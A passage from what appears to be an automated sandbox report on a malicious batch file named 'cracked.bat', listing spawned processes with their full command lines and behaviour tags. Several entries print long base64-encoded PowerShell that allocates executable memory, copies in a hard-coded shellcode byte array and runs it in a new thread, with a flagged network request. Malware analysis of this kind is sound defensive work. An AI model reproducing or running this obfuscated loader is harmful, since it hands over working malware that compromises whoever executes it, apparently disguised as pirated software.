wAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwA4ACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgAOQA3ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAA3AGEALAAwAHgAYwBhACwAMAB4ADYAYQAsADAAeAA2ADMALAAwAHgANwBiACwAMAB4AGIANQAsADAAeABlADMALAAwAHgAOAA2ACwAMAB4ADQAYQAsADAAeABlADcALAAwAHgAOQAwACwAMAB4AGMAMwAsADAAeABmAGYALAAwAHgAMwA3ACwAMAB4AGQAMgAsADAAeAA4ADEALAAwAHgAZgAzACwAMAB4AGIAYwAsADAAeABiADYALAAwAHgAMwAxACwAMAB4ADMAZAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADgAZQAsADAAeAA3ADcALAAwAHgAZQA0ACwAMAB4AGMAZAAsADAAeAA4ADIALAAwAHgAYQBmACwAMAB4AGQAOQAsADAAeAAxADEALAAwAHgAYwBlACwAMAB4ADgAYwAsADAAeAA3ADgALAAwAHgAZQBlACwAMAB4ADAAYwAsADAAeABjADEALAAwAHgANQBhACwAMAB4AGMAZgAsADAAeABkAGYALAAwAHgAMQA0ACwAMAB4ADkAYQAsADAAeAAwADgALAAwAHgAOQA2ACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgAYwA0ACwAMAB4ADcAZgAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGYAOQAsADAAeABmADQALAAwAHgANgA1ACwAMAB4AGUAMgAsADAAeABmADgALAAwAHgAZABhACwAMAB4AGUAMQAsADAAeAA1AGEALAAwAHgAOAAzACwAMAB4ADUAZgAsADAAeAAzADUALAAwAHgAMgBlACwAMAB4ADMAZgAsADAAeAA1AGUALAAwAHgANgA2ACwAMAB4ADQANAAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4AGQAMAAsADAAeAAxADAALAAwAHgANwA3ACwAMAB4AGIANQAsADAAeAAxADkALAAwAHgANgA2ACwAMAB4ADQAYgAsADAAeABmAGYALAAwAHgAMQAyACwAMAB4AGIAMwAsADAAeAAzADgALAAwAHgAZgBlACwAMAB4AGYAMgAsADAAeAA4AGQALAAwAHgAYwAxACwAMAB4ADMAMAAsADAAeAAzAGEALAAwAHgAMgBjACwAMAB4AGYAMgAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4AGEAZQAsADAAeABjAGEALAAwAHgANwA5ACwAMAB4ADgANgAsADAAeABjADQALAAwAHgAMgAwACwAMAB4ADcAYQAsADAAeAAzAGIALAAwAHgAZABmACwAMAB4AGYAMgAsADAAeAAwADAALAAwAHgAZQA3ACwAMAB4ADYAYQAsADAAeABlADUALAAwAHgAYQAzACwAMAB4ADYAYwAsADAAeABjAGMALAAwAHgAYwAxACwAMAB4ADUAMgAsADAAeABhADEALAAwAHgAOABiACwAMAB4ADgAMgAsADAAeAA1ADkALAAwAHgAMABlACwAMAB4AGQAZgAsADAAeABjAGQALAAwAHgANwBkACwAMAB4ADkAMQAsADAAeAAwAGMALAAwAHgANgA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAYgAzACwAMAB4AGEAOQAsADAAeAAwAGIALAAwAHgANQA4ACwAMAB4ADkAMAAsADAAeAA2AGQALAAwAHgANQA3ACwAMAB4ADMAYgAsADAAeABiADkALAAwAHgAMwA0ACwAMAB4ADMAZAAsADAAeABlAGEALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA5ADkALAAwAHgANQAzACwAMAB4ADYAMwAsADAAeAAyADMALAAwAHgAMAA4ACwAMAB4ADgAMgAsADAAeAAxADMALAAwAHgAYwBjACwAMAB4AGQAMgAsADAAeABhAGIALAAwAHgANAA5ACwAMAB4ADUAYgAsADAAeAAxAGUALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAA5AGIALAAwAHgAMAA4ACwAMAB4AGYAMgAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4ADkANwAsADAAeABhADgALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAA1ADAALAAwAHgANwA2ACwAMAB4ADQAOQAsADAAeAA5ADMALAAwAHgANwA3ACwAMAB4ADgAOQAsADAAeAA4ADUALAAwAHgAMQBiACwAMAB4ADEANwAsADAAeAA3ADQALAAwAHgAMgA2ACwAMAB4ADUAYwAsADAAeAAzADEALAAwAHgAYgAyACwAMAB4ADcAMgAsADAAeAAwAGMALAAwAHgAMgA5ACwAMAB4ADEAMwAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGEAOQAsADAAeAA5AGMALAAwAHgAMgBlACwAMAB4ADcAZAAsADAAeABhADAALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeAAzAGIALAAwAHgANgA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAMwBlACwAMAB4ADkAMgAsADAAeAA2ADYALAAwAHgAMgBiACwAMAB4AGIANwAsADAAeAA3ADQALAAwAHgAYwA4ACwAMAB4AGUANAAsADAAeAA5ADgALAAwAHgAMgA4ACwAMAB4AGEAOAAsADAAeAA1ADQALAAwAHgANQA5ACwAMAB4ADkAOQAsADAAeAA0ADAALAAwAHgAYgBmACwAMAB4ADUANgAsADAAeABjADYALAAwAHgANwAwACwAMAB4AGMAMAAsADAAeABiAGMALAAwAHgANgBmACwAMAB4ADEAYQAsADAAeAAyAGYALAAwAHgANgA5ACwAMAB4AGMANwAsADAAeABiADIALAAwAHgAZAA2ACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeABlAGYALAAwAHgAZAA5ACwAMAB4ADYAMwAsADAAeAA5AGMALAAwAHgAMQBjACwAMAB4ADEAZAAsADAAeAAyAGQALAAwAHgANQA1ACwAMAB4ADYAOAAsADAAeAAwAGQALAAwAHgAZAA5ACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANgBmACwAMAB4ADQAZgAsADAAeABhADkALAAwAHgAOQBkACwAMAB4ADEAYQAsADAAeAA2AGYALAAwAHgAMwBmACwAMAB4ADEAYQAsADAAeAA4AGQALAAwAHgAMwA4ACwAMAB4AGQANwAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAZQAsADAAeAA3ADgALAAwAHgAZABhACwAMAB4AGQAZgAsADAAeAAwADUALAAwAHgAYgAxACwAMAB4ADQAZQAsADAAeABhADAALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeAA5AGUALAAwAHgAMgAwACwAMAB4ADgAMQAsADAAeABlADgALAAwAHgAZgA0ACwAMAB4ADIAMAAsADAAeABlADkALAAwAHgANABjACwAMAB4AGEAZAAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADkAMwAsADAAeAA3ADgALAAwAHgAZQA3ACwAMAB4ADkAZAAsADAAeAAwADYALAAwAHgAOAAzACwAMAB4ADUAZQAsADAAeAA3ADIALAAwAHgAOAAwACwAMAB4AGUAYgAsADAAeAA1AGMALAAwAHgAYQBkACwAMAB4AGUANgAsADAAeABiADMALAAwAHgAOQBmACwAMAB4ADkAOAAsADAAeABmADYALAAwAHgAOAA4ACwAMAB4ADQAOQAsADAAeABlADQALAAwAHgAOABjACwAMAB4AGUAMAAsADAAeAA0ADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFMAZQBvAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABTAGUAbwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUwBlAG8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:6012

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pbmxxia4\pbmxxia4.cmdline"
5⤵
PID:6136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA9E.tmp" "c:\Users\Admin\AppData\Local\Temp\pbmxxia4\CSC66B8613A35AA475A8926886B1C29A30.TMP"
6⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\cracked.bat" "
1⤵
PID:3548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv N -;sv xBk ec;sv S ((gv N).value.toString()+(gv xBk).value.toString());powershell (gv S).value.toString() 'JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA='"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAH